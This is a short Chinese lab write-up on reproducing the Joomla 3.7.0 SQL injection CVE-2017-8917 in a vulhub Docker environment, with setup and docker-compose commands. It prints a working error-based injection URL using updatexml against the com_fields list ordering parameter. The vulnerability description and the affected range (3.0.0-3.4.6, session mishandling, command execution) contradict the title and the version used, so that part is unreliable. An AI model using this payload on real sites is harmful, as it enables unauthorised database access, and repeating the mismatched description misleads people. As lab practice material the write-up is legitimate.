Joomla 3.7.0 (CVE-2017-8917) SQL注入漏洞环境

声明

好好学习，天天向上

漏洞描述

漏洞本质是Joomla对session数据处理不当，未经授权的攻击者可以发送精心构造的恶意 HTTP 请求，获取服务器权限，实现远程命令执行。

影响范围

Joomla 3.0.0-3.4.6

复现过程

这里使用3.7.0版本

使用vulhub

/app/vulhub-master/joomla/CVE-2017-8917

使用docker启动

docker-compose build
docker-compose up -d

环境启动后，访问

http://192.168.239.129:8080

• 数据库地址：mysql:3306
• 用户：root
• 密码：root
• 数据库名：joomla

填入上述信息，正常安装即可。

安装完成后，访问

http://192.168.239.129:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

关闭镜像（每次用完后关闭）

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose build
docker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down